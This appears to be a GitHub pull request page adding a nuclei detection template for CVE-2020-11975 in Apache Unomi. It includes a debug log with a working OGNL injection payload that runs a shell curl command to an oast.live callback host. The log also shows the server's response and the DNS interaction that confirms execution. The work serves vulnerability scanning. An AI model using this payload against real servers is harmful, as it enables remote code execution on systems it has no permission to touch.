Skip to content

Create CVE-2020-11975.yaml #12678

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
merged 6 commits into from
Aug 22, 2025
Merged

Create CVE-2020-11975.yaml #12678

merged 6 commits into from
Aug 22, 2025
+83 −0

Conversation

@Sourabh-Sahu
Copy link
Contributor

@Sourabh-Sahu Sourabh-Sahu commented Jul 21, 2025

Template / PR Information

Added CVE-2020-11975 : Apache Unomi - Expression Language Injection

Template Validation

I've validated this template locally?

  • YES
  • NO
└─$ nuclei -u http://192.168.1.32:8181 -t CVE-2020-11975.yaml -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.2

		projectdiscovery.io

[WRN] Found 1 templates loaded with deprecated protocol syntax, update before v3 for continued support.
[INF] Current nuclei version: v3.3.2 (outdated)
[INF] Current nuclei-templates version: v10.2.5 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 75
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.live
[INF] [CVE-2020-11975] Dumped HTTP request for http://192.168.1.32:8181/context.json

POST /context.json HTTP/1.1
Host: 192.168.1.32:8181
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15
Connection: close
Content-Length: 737
Accept: */*
Accept-Language: en
Content-Type: application/json
Accept-Encoding: gzip

{
  "personalizations":[
    {
      "id":"gender-test_anystr",
      "strategy":"matching-first",
      "strategyOptions":{
        "fallback":"var2"
      },
      "contents":[
        {
          "filters":[
            {
              "condition":{
                "parameterValues":{
                  "propertyName":"(#[email protected]@getRuntime()).(#r.exec(\"curl d1v446p3hd7d1eercva0fr1a6jhfyw5jd.oast.live\"))",
                  "comparisonOperator":"equals_anystr",
                  "propertyValue":"male_anystr"
                },
                "type":"profilePropertyCondition"
              }
            }
          ]
        }
      ]
    }
  ],
  "sessionId":"test-demo-session-id"
}
[DBG] [CVE-2020-11975] Dumped HTTP response http://192.168.1.32:8181/context.json

HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Methods: OPTIONS, POST, GET
Access-Control-Allow-Origin: *
Content-Type: application/json;charset=utf-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Server: Jetty(9.3.21.v20170918)
Set-Cookie: context-profile-id=8911110f-537c-4ca9-8202-a5d15960b890;Path=/;Expires=Tue, 21-Jul-2026 13:35:25 GMT
Set-Cookie: context-profile-id=8a3e4471-6754-4dfe-b367-c846334069c0;Path=/;Expires=Tue, 21-Jul-2026 13:35:25 GMT

{"profileId":"8a3e4471-6754-4dfe-b367-c846334069c0","sessionId":"test-demo-session-id","profileProperties":null,"sessionProperties":null,"profileSegments":null,"filteringResults":null,"personalizations":{"gender-test_anystr":["var2"]},"trackedConditions":[],"anonymousBrowsing":false,"consents":{}}
[d1V446p3HD7d1EercvA0fr1A6jhfyw5jD] Received DNS interaction from 172.253.220.24 at 2025-07-21 13:35:25
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 28451
;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;d1V446p3HD7d1EercvA0fr1A6jhfyw5jD.OAsT.livE.	IN	 A



------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 28451
;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;d1V446p3HD7d1EercvA0fr1A6jhfyw5jD.OAsT.livE.	IN	 A

;; ANSWER SECTION:
d1V446p3HD7d1EercvA0fr1A6jhfyw5jD.OAsT.livE.	3600	IN	A	178.128.210.172

;; AUTHORITY SECTION:
d1V446p3HD7d1EercvA0fr1A6jhfyw5jD.OAsT.livE.	3600	IN	NS	ns1.oast.live.
d1V446p3HD7d1EercvA0fr1A6jhfyw5jD.OAsT.livE.	3600	IN	NS	ns2.oast.live.

;; ADDITIONAL SECTION:
ns1.oast.live.	3600	IN	A	178.128.210.172
ns2.oast.live.	3600	IN	A	178.128.210.172


[CVE-2020-11975:word-1] [http] [critical] http://192.168.1.32:8181/context.json

/claim #12668

Additional References:

@algora-pbc algora-pbc bot mentioned this pull request Jul 21, 2025
Closed
Sourabh-Sahu and others added 2 commits July 21, 2025 19:30
@Sourabh-Sahu
Update CVE-2020-11975.yaml
25579a2
@princechaddha
enhance CVE-2020-11975 template
acb7b20 
- improve template name clarity (Remote Code Execution)
- refine description for better readability
- add impact and remediation sections
- add official Apache security advisory reference
- enhance classification with EPSS scores and CPE
- add vendor/product metadata and Shodan query
- reorder tags for consistency (cve first)
@princechaddha
Copy link
Member

princechaddha commented Jul 23, 2025

Thank you for contributing to nuclei-templates! You can join our Discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you once again.

Review Summary

I've reviewed your CVE-2020-11975 Apache Unomi template and made several enhancements to improve its quality and consistency with project standards.

Changes Made ✅

  • Enhanced template name from "Apache Unomi - Expression Language Injection" to "Apache Unomi - Remote Code Execution" for clarity
  • Refined description for better readability and conciseness
  • Added impact section explaining the potential consequences of successful exploitation
  • Added remediation section with specific mitigation steps
  • Added official Apache security advisory reference
  • Enhanced classification section with EPSS scores and CPE information
  • Added vendor/product metadata for better categorization
  • Added Shodan query for improved discoverability: http.title:"Apache Unomi" || "Apache Unomi"
  • Reordered tags for consistency (CVE tags first): cve,cve2020,apache,unomi,rce,ognl,oast

Template Validation

  • ✅ Template ID matches CVE identifier
  • ✅ Template is in correct directory (http/cves/2020/)
  • ✅ No duplicate templates found
  • ✅ Follows proper YAML structure and CVE template format
  • ✅ Uses OAST (out-of-band) detection with interactsh for reliable RCE verification
  • ✅ Contains proper OGNL payload for Apache Unomi exploitation

Other Suggestions

  • The template effectively uses OAST detection which is excellent for RCE verification
  • The OGNL payload is well-crafted and targets the known vulnerable endpoint
  • Consider testing against a vulnerable Apache Unomi instance if possible to ensure the payload works reliably

The template now follows project standards with comprehensive metadata, proper classification, and clear documentation. Excellent work on creating this critical CVE template!

Note: I am an experimental AI Template Bot. The ProjectDiscovery team will review this PR shortly.

@princechaddha princechaddha added the Status: In Progress This issue is being worked on, and has someone assigned. label Jul 23, 2025
@ritikchaddha ritikchaddha added waiting for more info Done Ready to merge and removed Status: In Progress This issue is being worked on, and has someone assigned. waiting for more info labels Aug 18, 2025
@ritikchaddha
Copy link
Contributor

ritikchaddha commented Aug 22, 2025

Hello @Sourabh-Sahu, thank you for sharing this template and providing additional information. The template is now ready to merge.🥂

@DhiyaneshGeek DhiyaneshGeek merged commit a5dce36 into projectdiscovery:main Aug 22, 2025
3 checks passed
@princechaddha princechaddha linked an issue Sep 1, 2025 that may be closed by this pull request
CVE-2018-19127 - PHPCMS 2008 - Remote Code Execution 💰 #12722
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@DhiyaneshGeek DhiyaneshGeek DhiyaneshGeek approved these changes

Assignees

@ritikchaddha ritikchaddha

Labels

🙋 Bounty claim Done Ready to merge

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

CVE-2018-19127 - PHPCMS 2008 - Remote Code Execution 💰

4 participants

@Sourabh-Sahu @princechaddha @ritikchaddha @DhiyaneshGeek